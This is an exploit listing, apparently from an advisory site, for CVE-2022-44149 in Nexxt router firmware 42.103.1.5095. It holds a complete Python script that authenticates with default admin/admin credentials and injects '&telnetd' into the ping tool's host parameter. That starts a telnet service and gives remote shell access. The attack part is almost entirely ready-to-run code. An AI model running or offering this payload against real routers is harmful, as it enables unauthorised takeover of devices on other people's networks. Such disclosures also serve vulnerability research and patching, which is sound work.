Nexxt Router Firmware 42.103.1.5095 Remote Code Execution

2023.01.05
Risk: High
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated) # Date: 19/10/2022 # Exploit Author: Yerodin Richards # Vendor Homepage: https://www.nexxtsolutions.com/ # Version: 42.103.1.5095 # Tested on: ARN02304U8 # CVE : CVE-2022-44149 import requests import base64 router_host = "http://192.168.1.1" username = "admin" password = "admin" def main(): send_payload("&telnetd") print("connect to router using: `telnet "+router_host.split("//")[1]+ "` using known credentials") pass def gen_header(u, p): return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii") def send_payload(payload): url = router_host+"/goform/sysTools" headers = {"Authorization": "Basic {}".format(gen_header(username, password))} params = {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK"} requests.post(url, headers=headers, data=params) if __name__ == '__main__': main()


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023, cxsecurity.com

 

Back to Top